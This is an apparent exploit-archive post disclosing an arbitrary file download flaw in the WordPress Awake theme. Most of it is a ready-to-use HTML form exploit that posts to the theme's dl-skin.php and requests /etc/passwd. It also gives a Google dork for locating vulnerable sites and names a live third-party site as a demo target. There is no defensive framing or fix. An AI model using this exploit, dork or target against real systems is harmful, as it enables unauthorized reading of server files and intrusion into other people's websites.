facebook facebook twitter rss

Wordpress Awake Theme Arbitrary File Download Vulnerability

Author: Aloulou , Published: 23-06-2014
############################################################################

# Title : Wordpress Awake Theme Arbitrary File Download Vulnerability

# Author : Aloulou

# Date : 19/06/2014

# Facebook : http://www.facebook.com/Aloulou.TN

# Email: aloulou@alquds.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/themes/awake

# Tested on : Linux



############################################################################



Exploit:

<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/awake/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>





Demo:http://www.hirondelle37.fr

# Greeting to : Tunisia , CyberPink , AnonBoy and All muslims

Like us on Facebook :